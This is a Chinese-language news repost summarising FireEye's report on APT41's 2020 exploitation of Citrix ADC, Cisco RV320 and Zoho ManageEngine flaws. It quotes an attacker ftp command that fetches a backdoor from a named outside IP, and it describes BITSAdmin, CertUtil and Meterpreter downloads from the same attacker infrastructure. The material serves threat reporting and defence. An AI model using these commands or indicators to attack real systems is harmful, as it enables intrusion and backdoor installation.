安基网 首页 资讯 安全报 查看内容

美安全公司FireEye:中国黑客组织APT41试图发起全球入侵活动

2020-3-30 12:41| 投稿: xiaotiger |来自: 互联网


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 美国网络安全巨头FireEye于近日发文称,被他们判定来自中国的黑客组织APT41从今年年初开始发起了自该组织成立以来规模最大的入侵活动,波及澳大利亚、加拿大、丹麦、芬兰、法国、印度、意大利、日本、马来西亚、墨西哥、菲律宾、波兰、卡塔尔、沙特阿拉伯、新加坡、瑞典、瑞士、阿联酋、英国以及美国等 ...


美国网络安全巨头FireEye于近日发文称,被他们判定来自中国的黑客组织APT41从今年年初开始发起了自该组织成立以来规模最大的入侵活动,波及澳大利亚、加拿大、丹麦、芬兰、法国、印度、意大利、日本、马来西亚、墨西哥、菲律宾、波兰、卡塔尔、沙特阿拉伯、新加坡、瑞典、瑞士、阿联酋、英国以及美国等数十个国家。

FireEye在文章中指出,在1月20日至3月11日期间,APT41利用Citrix NetScaler/ADC、思科路由器以及Zoho ManageEngine Desktop Central中的漏洞攻击了分属银行/金融、建筑、国防、政府、医疗、高科技、高等教育、法律、制造业、媒体、非营利、石油和天然气、石化、制药、房地产、电信、运输、旅行以及软件等众多行业的组织,其中有超过75家是FireEye的客户。

为了证实其说法的真实性,FireEye在文章中还公布了他们针对这起入侵活动的调查成果。接下来,就让我们一起来看看吧。

CVE-2019-19781(Citrix ADC漏洞)利用活动

FireEye表示,APT41从1月20日开始试图利用CVE-2019-19781(于2019年12月17日被公开披露)入侵Citrix Application Delivery Controller(ADC)和Citrix Gateway设备。

图1.FireEye整理的关键事件时间表

1月20日和1月21日的CVE-2019-19781漏洞利用活动涉及到执行命令“file /bin/pwd”,这可以帮助APT41实现两个目标:一是能够确认系统是否已安装补丁,进而判断设备是否能够被入侵;二是能够获取到与系统体系结构相关的信息(据称,这是为了给后续部署后门做准备)。

图2.CVE-2019-19781漏洞利用HTTP流量示例(1月20日和1月21日)

1月23至2月1日,漏洞利用活动出现了短暂的中断。FireEye认为,这很可能与1月24日至1月30期间的中国农历新年假期有关。

从2月1日开始,APT41开始执行命令“/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]@66.42.98[.]220/bsd”,以下载被命名为“bsd”的有效载荷(被FireEye怀疑是一种新后门)。

图3.CVE-2019-19781漏洞利用HTTP流量示例(2月1日)

2月2日至2月19日,漏洞利用活动再次中断。FireEye认为,这很可能与中国爆发的新型肺炎疫情有关。

2月24日和2月25日,针对CVE-2019-19781的漏洞利用明显增加,且利用行为几乎与2月1日的活动几乎完全一致,仅仅是将有效载荷的名称更改为了“un”。

图4. CVE-2019-19781漏洞利用HTTP流量示例(2月24日和2月25日)

思科路由器漏洞利用活动

FireEye表示,APT41在2月21日成功利用漏洞侵入了一家电信组织的Cisco RV320路由器,并下载了名为“fuc”的有效载荷。尽管尚不清楚利用的是哪些漏洞,但可以的是,其中一个模块结合利用了CVE-2019-1653和CVE-2019-1652,这允许攻击者在Cisco RV320和RV325小型企业路由器上实现远程代码执行,并使用wget下载指定的有效载荷。

图5.Cisco RV320路由器通过wget下载有效载荷的HTTP请求示例

CVE-2020-10189(Zoho ManageEngine零日漏洞)利用活动

FireEye表示,APT41从3月8日开始试图利用CVE-2020-10189攻击目标组织,设计两种有效载荷部署方式。

第一种方式涉及利用CVE-2020-10189漏洞直接上传基于Java的简单程序“logger.zip”,其中包含一组可用于使用PowerShell下载并执行install.bat和storesyncsvc.dll的命令。

图6.logger.zip的内容

第二种方式涉及利用Microsoft BITSAdmin命令行工具从端口12345上的已知APT41基础设施66[.]42[.]98[.]220下载install.bat。

无论是方式一还是方式二,它们都涉及到使用install.bat来实现被命名为“storesyncsvc.dll”的Cobalt Strike BEACON加载程序的长久驻留。

图7.install.bat的内容

在漏洞利用成功之后,APT41使用storecyncsvc.dll BEACON后门下载了另一个具有不同C2地址的辅助后门,进而利用该后门下载了2.exe(VMProtected Meterpreter下载器,用于下载Cobalt Strike BEACON shellcode)。

图8.通过CertUtil下载2.exe的HTTP请求示例

Meterpreter下载器“TzGG”被配置为通过端口443与91[.]208[.]184[.]78通信,以下载Cobalt Strike BEACON(试用版)的shellcode。

图9.下载Cobalt Strike BEACON shellcode的HTTP请求示例

结语

FireEye表示,在这场规模庞大的入侵活动中,尽管APT41使用的是一些公开可用的恶意软件(如Cobalt Strike和Meterpreter),但从该组织此前的活动来看,他们必定会在后续部署更为高级的恶意软件。

FireEye还表示,即使到了2020年,APT41在他们所追踪的黑客组织中仍是最强劲的一个。新发现的这场入侵活动也再次表明,该组织确实拥有快速利用新披露的漏洞来发起攻击的能力。



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6808358417086808583/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!


鲜花

握手

雷人
1

路过

鸡蛋

刚表态过的朋友 (1 人)

相关阅读

最新评论

 最新
返回顶部